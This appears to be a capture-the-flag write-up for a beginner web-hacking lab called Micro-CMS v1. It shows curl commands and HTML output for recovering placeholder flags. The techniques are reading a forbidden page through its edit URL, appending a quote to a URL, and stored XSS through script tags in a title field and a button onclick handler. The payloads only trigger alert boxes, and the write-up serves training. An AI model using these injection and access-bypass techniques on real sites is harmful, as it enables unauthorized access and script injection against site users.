two
TRIVIAL : little something to get you started
being trivial flag must be in the source, so using curl
$ curl <url-instance>
gives the source :
1 |
|
notice :
1 | background-image: url("background.png"); |
again with /background.png
1 | curl <url-instance>/background.png |
gives :^FLAG^<flag>$FLAG$
here <flag> is a placeholder to the real flag.
EASY : Micro-CMS v1
on thinkering with source and ui, structure ::
page urls :: <url-instance>/page/<page-number>
edit page urls :: <url-instance>/page/edit/<page-number>
FLAG 1
editing and traversing pages in order fetches ‘NOT FOUND’,$ curl <url-instance>/page/<page-number>BUT, on one of the pages fetches ‘FORBIDDEN’,1
2
3
4
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>$ curl <url-instance>/page/<page-number>hence, we cant really see what there is on this page so as a work around we’ll change url in order to edit the page,1
2
3
4
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>url <url-instance>/page/edit/<page-number-forbidden1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<html>
<head>
<title>Edit page</title>
</head>
<body>
<a href="../../"><-- Go Home</a>
<h1>Edit Page</h1>
<form method="POST">
Title: <input type="text" name="title" value="Private Page"><br>
<textarea name="body" rows="10" cols="80">My secret is ^FLAG^<flag>$FLAG$</textarea><br>
<input type="submit" value="Save">
<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
</form>
</body>
</html>
<!--flag in <textarea> under holder <flag>-->
FLAG 2
simple injection on url under/edit/with'$ curl <url-instance>/page/edit/<any-page-number>\'$ curl <url-instance>/page/edit/<any-pagenumber>\'"awd"sasatsgasgas
turns out if characters are appended after'doesn’t change much in output!these commands outputs gives required flag.
FLAG 3
Micro-CMS is vulnerable to XSS so after trying for a while xss does comes out ahead for remaining flags.
the way this page is created it mitigates xss injection on<textarea>and actively changes<script></script>to<scrubbed></scrubbed>$ curl <url-instance>/page/edit/1XSS in1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<html>
<head>
<title>Edit page</title>
</head>
<body>
<a href="../../"><-- Go Home</a>
<h1>Edit Page</h1>
<form method="POST">
Title: <input type="text" name="title" value="Testing"><br>
<textarea name="body" rows="10" cols="80"><script>alert('slert')</script></textarea><br>
<input type="submit" value="Save">
<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
</form>
</body>
</html><textarea>changes to$ curl <url-instance>/page/1furthermore, if we use same XSS on1
2
3
4
5
6
7
8
9
10
11
12
<html>
<head>
<title>Testing</title>
</head>
<body>
<a href="../"><-- Go Home</a><br>
<a href="edit/1">Edit this page</a>
<h1>Testing</h1>
<scrubbed>alert('slert')</scrubbed>
</body>
</html>Title : <input..>it works( requires to navigate to base url after saving)!$ curl <url-instance>/page/edit/1payload in form’s1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<html>
<head>
<title>Edit page</title>
</head>
<body>
<a href="../../"><-- Go Home</a>
<h1>Edit Page</h1>
<form method="POST">
Title: <input type="text" name="title" value="<script>alert('slert')</script>"><br>
<textarea name="body" rows="10" cols="80"><script>alert('slert')</script> </textarea><br>
<input type="submit" value="Save">
<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
</form>
</body>
</html><input value="..">$ curl <url-instance>/page/1to finally obtain the flag navigate back to base url to Micro-CMS url, giving flag as an alert1
2
3
4
5
6
7
8
9
10
11
12
<html>
<head>
<title><script>alert('slert')</script></title>
</head>
<body>
<a href="../"><-- Go Home</a><br>
<a href="edit/1">Edit this page</a>
<h1><script>alert('slert')</script></h1>
<scrubbed>alert('slert')</scrubbed>
</body>
</html>$ curl <url-instance>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<html>
<head>
<title>Micro-CMS</title>
</head>
<body>
<ul>
<li><a href="page/1"><script>alert("^FLAG^<flag>$FLAG$");</script><script>alert('slert')</script></a></li>
<li><a href="page/2">Markdown Test</a></li>
<li><a href="page/9">awd</a></li>
</ul>
<a href="page/create">Create a new page</a>
</body>
</html>
<!--flag under <href> with <flag> placeholder-->
FLAG 4
XSS can be injected to buttons, under edit pages insert payload
<button onclick=alert("xss")>call</button>$ curl <url-instance>/page/edit/10button xss onclick function calls alert!1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<html>
<head>
<title>Edit page</title>
</head>
<body>
<a href="../../"><-- Go Home</a>
<h1>Edit Page</h1>
<form method="POST">
Title: <input type="text" name="title" value="button"><br>
<textarea name="body" rows="10" cols="80"><button onclick=alert("aha")>call</button></textarea><br>
<input type="submit" value="Save">
<div style="font-style: italic"><a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">Markdown</a> is supported, but scripts are not</div>
</form>
</body>
</html>$ curl <url-instance>/page/101
2
3
4
5
6
7
8
9
10
11
12
13
<html>
<head>
<title>button</title>
</head>
<body>
<a href="../"><-- Go Home</a><br>
<a href="edit/10">Edit this page</a>
<h1>button</h1>
<p><button flag="^FLAG^<flag>$FLAG$" onclick=alert("aha")>call</button></p>
</body>
</html>
<!--flag under placeholder <flag>-->